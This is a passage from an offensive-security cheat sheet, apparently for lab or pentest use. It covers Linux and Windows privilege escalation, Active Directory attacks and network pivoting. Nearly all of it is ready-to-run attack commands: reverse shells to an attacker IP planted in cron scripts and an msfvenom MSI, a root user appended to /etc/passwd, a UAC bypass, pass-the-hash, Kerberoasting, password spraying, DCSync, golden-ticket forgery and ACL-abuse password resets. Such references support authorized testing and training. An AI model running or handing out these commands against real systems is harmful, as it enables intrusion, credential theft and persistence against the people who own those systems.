echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" >> /path/to/script.sh
# If a cron uses a relative binary path — PATH hijack
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
Capabilities
# Find binaries with special capabilities assigned
getcap -r / 2>/dev/null
# cap_setuid — allows changing UID to root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Writable /etc/passwd
# Generate a password hash
openssl passwd -1 -salt xyz hacker
# Append a new root user directly to /etc/passwd
echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
Kernel Exploits
# Check the kernel version
uname -r
cat /proc/version
# Well-known kernel exploits by CVE:
# DirtyCow CVE-2016-5195 Linux 2.6.22 < 3.9
# DirtyPipe CVE-2022-0847 Linux 5.8 to 5.16.11
# PwnKit CVE-2021-4034 polkit pkexec (most Linux distros)
# Linux Exploit Suggester maps your kernel version to known exploits
./linux-exploit-suggester.sh | grep -i "high"
Privilege Escalation — Windows
Automated Enumeration
# WinPEAS — comprehensive Windows privesc enumeration
.\winpeas.exe
# PowerUp — checks for common Windows misconfigurations
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt — security-focused host enumeration
.\Seatbelt.exe -group=all
# SharpUp — compiled alternative to PowerUp
.\SharpUp.exe audit
Service Exploits
# Find services that authenticated users can modify
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Find unquoted service paths — drop a binary at the unquoted path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# e.g. path: C:\Program Files\Vulnerable App\service.exe
# Drop payload at: C:\Program.exe or C:\Program Files\Vulnerable.exe
# Modify a weak service binary — replace it with your payload
sc stop <service>
# Replace binary, then:
sc start <service>
Registry
# AlwaysInstallElevated — installs MSI packages as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both keys = 1, generate a malicious MSI:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
# Check for stored autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s # PuTTY saved creds
Token Impersonation
# Check for impersonation privileges
whoami /priv
# SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege present? Use a potato attack.
# PrintSpoofer (Windows 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
# RoguePotato
.\RoguePotato.exe -r 10.10.14.5 -e "cmd.exe" -l 9999
# JuicyPotato (older Windows versions)
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
UAC Bypass
# Check UAC level
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Pass the Hash
# PSExec — spawn a shell using an NTLM hash (no plaintext password needed)
python3 psexec.py administrator@10.10.10.1 -hashes :NTLM_HASH
# NetExec — validate and use hash across SMB
netexec smb 10.10.10.1 -u administrator -H NTLM_HASH
netexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH # spray a subnet
# Evil-WinRM — WinRM shell using hash
evil-winrm -i 10.10.10.1 -u administrator -H NTLM_HASH
Active Directory
Initial Enumeration
# BloodHound.py — collect AD data from Linux without a foothold
python3 bloodhound.py -u user -p password -d domain.local -dc 10.10.10.1 -c All
# SharpHound — collect AD data from a Windows foothold
.\SharpHound.exe -c All
# NetExec — AD enumeration over SMB
netexec smb 10.10.10.1 -u user -p password --users
netexec smb 10.10.10.1 -u user -p password --groups
netexec smb 10.10.10.1 -u user -p password --shares
netexec smb 10.10.10.1 -u user -p password --pass-pol # check lockout policy before spraying
# enum4linux-ng — SMB/RPC enumeration
enum4linux-ng -A 10.10.10.1
# ldapdomaindump — dump all AD objects to HTML and JSON files
python3 ldapdomaindump.py -u 'domain\user' -p password 10.10.10.1
Kerberoasting
# Request TGS tickets for accounts with SPNs — crack offline without lockout risk
python3 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request
# PowerView on Windows — export tickets as hashcat-compatible format
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Crack TGS tickets
hashcat -m 13100 tickets.txt rockyou.txt
AS-REP Roasting
# Request AS-REP hashes for accounts with Kerberos pre-auth disabled (no password needed)
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.1 -no-pass
# Crack AS-REP hashes
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Password Spraying
# NetExec — spray one password across all users (check lockout policy first!)
netexec smb 10.10.10.1 -u users.txt -p 'Password123' --continue-on-success
# Kerbrute — Kerberos-based spray (generates fewer failed logon events than SMB)
kerbrute passwordspray -d domain.local --dc 10.10.10.1 users.txt 'Password123'
DCSync Attack
# Dump all domain hashes remotely — requires DA or replication rights
python3 secretsdump.py domain.local/admin:password@10.10.10.1
# Via Mimikatz on a Windows foothold
lsadump::dcsync /domain:domain.local /all /csv
lsadump::dcsync /domain:domain.local /user:krbtgt # just the krbtgt hash
Golden Ticket
# Forge a TGT for any user using the krbtgt hash — survives password resets
# Get krbtgt hash first via DCSync
# Mimikatz — create and inject the golden ticket
kerberos::golden /user:administrator /domain:domain.local \
/sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
# Use the ticket with impacket
export KRB5CCNAME=golden.ccache
python3 psexec.py domain.local/administrator@dc.domain.local -k -no-pass
Common AD Misconfigurations
# GenericAll / GenericWrite on a user — reset their password
python3 changepasswd.py domain.local/attacker:password@10.10.10.1 -newpass 'Hacked123!' -altuser victim
# WriteDACL on the domain object — grant yourself DCSync rights
python3 dacledit.py domain.local/user:password -dc-ip 10.10.10.1 -action write \
-rights DCSync -principal attacker -target-dn "DC=domain,DC=local"
# ForceChangePassword — change a user's password without knowing the current one
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force)
Pivoting & Tunnelling
SSH Tunnelling
# Local port forwarding — access an internal service via your local machine
# Reach 192.168.1.10:80 by browsing to localhost:8080
ssh -L 8080:192.168.1.10:80 user@jumphost
# Dynamic port forwarding — create a SOCKS proxy through SSH
ssh -D 1080 user@jumphost
# Then route tools through it with proxychains
# Remote port forwarding — expose your local listener on the remote host
ssh -R 4444:localhost:4444 user@attacker
# Jump through multiple hops in one command
ssh -J user@jumphost user@internal_host
Proxychains
# Add to /etc/proxychains.conf:
# socks5 127.0.0.1 1080
# Route any tool through the proxy
proxychains nmap -sT -Pn 192.168.1.1
proxychains curl http://192.168.1.1
proxychains python3 exploit.py
Chisel
# Fast TCP tunnel over HTTP — useful when SSH isn't available
# Attacker — start the server in reverse mode
./chisel server -p 8080 --reverse
# Target — connect back and create a reverse SOCKS proxy
./chisel client 10.10.14.5:8080 R:socks
# Forward a specific port (e.g. MySQL on the target to your local machine)
./chisel client 10.10.14.5:8080 R:3306:127.0.0.1:3306
Ligolo-ng
# Modern pivoting tool that creates a TUN interface — clean and transparent
# Attacker — start the proxy
./proxy -selfcert
# Target — connect the agent back to the attacker
./agent -connect 10.10.14.5:11601 -ignore-cert
# On attacker — add a route to the internal network
ip route add 192.168.1.0/24 dev ligolo
# Then in the ligolo UI: select session → start tunnel
Netsh (Windows Port Forwarding)
# Forward all connections on a local port to an internal host
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=4444 connectaddress=192.168.1.10
# View all active forwarding rules
netsh interface portproxy show all
# Remove a rule
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=0.0.0.0
Socat
# Forward traffic from one port to a remote host
socat TCP-LISTEN:8080,fork TCP:192.168.1.10:80
# Relay a reverse shell connection to another machine
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444
For SUID/capability binary exploitation, always check GTFOBins. For Windows binary abuse, check LOLBAS.